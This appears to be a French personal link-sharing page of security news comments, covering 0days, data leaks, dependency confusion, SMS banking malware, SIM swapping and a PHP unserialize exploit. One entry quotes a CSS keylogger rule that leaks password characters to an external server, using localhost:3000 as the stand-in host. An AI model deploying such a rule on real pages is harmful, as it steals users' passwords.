1109 private links
La 0day qui fait pas rire les mouettes : exécution de code quand on log une certaine chaine de caractères.
Ah quand même ! Code source versionné, projet non publié, mots de passe hashés, etc. Globalement il n'y a pas grand-chose qui n'ait pas leaké.
Il y a clairement un gros problème de sécurité pour qu'un hacker ait pu accéder à l'intégralité de ces informations. J'imagine qu'on en saura plus dans les prochains jours.
En attendant changez vos mots de passe et activez l'authentification 2 facteurs.
EDIT: Ah on y trouve également les revenus des streamers. Pas glop.
Impressionnant. En squattant le nom de bibliothèques internes - mais gérées par le dependency manager - il a pu injecter du code dans pas mal de grosses boites.
J'ai lu en diagonale mais je suis quand même surpris qu'il n'y a pas une mécanique obligatoire pour utiliser un repo privé sur ces outils.
#0day security vulnerability insudo
. Update your servers.
Un article sur le faux SMS que j'ai reçu dont je parlais là : https://links.hoa.ro/shaare/780VHQ
Il s'agit donc d'un malware qui porte le joli nom d'Alien :
C’est un malware de la famille Alien, une évolution de Cerberus. C’est donc avant tout un malware bancaire. Il récupère les identifiants des applications bancaires, mais il cherche aussi les identifiants de nombreuses autres apps populaires comme Facebook, WhatsApp, LinkedIn…
Propre : je reçois une deuxième fois le fameux SMS du gouv, avec a priori le même expéditeur, sauf que cette fois le lien inclus dans le SMS est en bit.ly.
Au début je pense à une fausse manipulation, mais en fait c'est un bon vieux scam à l'ancienne. Bien joué à notre gouvernement, à la pointe de la technologie, d'avoir choisi le SMS comme moyen de communication descendante. C'est vraiment la meilleur chose à faire en 2020.
D'ailleurs au passage j'ai vu sur Twitter que certains l'ont reçu aujourd'hui, moi dimanche. C'est efficace. Je leur suggère d'envoyer un fax la prochaine fois.
Interesting reflection on password hash algorithms and resource consumption by Nicolas Grekas. The conclusion is often the same though, we should get rid of passwords somehow.
Malin ! Un keylogger en CSS !
En fait un script génère pour tous les caractères ASCII, l'instruction CSS suivante :
input[type="password"][value$="a"] {
background-image: url("http://localhost:3000/a");
}
Qui signifie que pour les champs de type password
dont la valeur se termine par a
, on va effectuer une requête externe vers un serveur avec la lettre a
. On fait ça pour tous les caractères et hop on a le mot de passe.
La société [a] fait face à une attaque informatique qui a bloqué le fonctionnement de plusieurs serveurs faisant fonctionner les applications critiques de l’entreprise.
TLDR: Usurpation d'identité pour récupérer une carte SIM associée au numéro de la cible.
C'est pour ça qu'on considère aujourd'hui que l'authentification à deux facteurs via SMS n'est pas suffisamment sécurisée.
Moche. Mais j'imagine que ça sera vite patché.
Effectivement c'est pas malin de leur part... Si on va voir e-i.com, on constate que c'est la filiale tech du Crédit Mutuel.
J’ai trouvé cet article passionnant, j’adore ces astuces rendant le système inutilisable ha ha. Je débute une liste, j’espère que vous y participerez
Ah ah ! Bloquer le serveur X par un simple changement, c'est bien vu, et vicieux pour trouver la source du problème.
During a brief period of unauthorized access to a Docker Hub database, sensitive data from approximately 190,000 accounts may have been exposed (less than 5% of Hub users). Data includes usernames and hashed passwords for a small percentage of these users, as well as Github and Bitbucket tokens for Docker autobuilds.
Chaud ! Mais je ne suis pas impacté apparemment, puisque je n'ai pas reçu d'email.
Wow je suis très surpris. Ça n'est pas justement le but des headers CORS de bloquer les requêtes vers des sites externes ? Ou alors ça ne s'applique ni aux redirections, ni aux images ?
Intéressant également, quel est l'intérêt de mon navigateur à communiquer mon GPU ou le nombre de cores de mon CPU sur cette page ?
EDIT : En revanche, la localisation sur cette page ne semble pas fonctionner. Elle me situe à Perpignan, ce qui n'est ni l'emplacement de mon serveur VPN (via l'IP donc), ni la mienne.
Google a trouvé un moyen de générer des collisions de hash SHA-1, et donc de générer deux documents différents avec des hash identiques.
Ce n'est pas une faille dans l'algorithme, mais plus sa relative faiblesse qui rend cette attaque plus efficace qu'un simple bruteforce (inenvisageable aujourd'hui).
Bref, pour vos hash, utilisez SHA-256 dit Google.
Petite réflexion sur la sécurité des objets connectés. Ils sont de plus en plus nombreux, généralement peu sécurisé, et de toute façon presque jamais mis à jour, etc.
Le problème se pose quand il s'agit d'objets critiques, comme une voiture, un ascenseur d'hôpital, etc.
Un groupe de hacker a réussi à avoir un contrôle distant complet sur les serveurs Pornhub en découvrant deux failles 0-day sur PHP ; sachant que c'est un secteur qui ne lésine pas sur la sécurité vu que la concurrence n'est pas toujours très réglo.
Pour résumer :
Ils ont découvert qu'il était possible de définir un cookie, qui fait appel à la fonction PHP unserialize()
, via une simple requête. À partir de là, ils ont utilisé un fuzzer pour détecter d'éventuelles anomalies dans le comportement de unserialize()
. Ils en ont trouvé et, suite à analyse, ils ont découvert un bug dans l'algorithme du garbage collector de PHP.
Ce bug, appelée faille « use-after-free » (utilisation de la mémoire après qu'elle soit libérée), leur a permis d'exécuter du code à distance directement sur le serveur, via des techniques de manipulation de mémoire auxquelles je ne comprends pas tout. Et résultat des courses, ils ont pu faire un dump complet de la base de données et accès au code source de pornhub.
Sacrément balaise ! Ils ont bien mérité leur prime de $20.000.
C'était en juin, vérifiez que vos versions de PHP sont à jour.
via http://lehollandaisvolant.net/?id=20160725122057 - Rien à voir avec la gestion des fichiers par contre.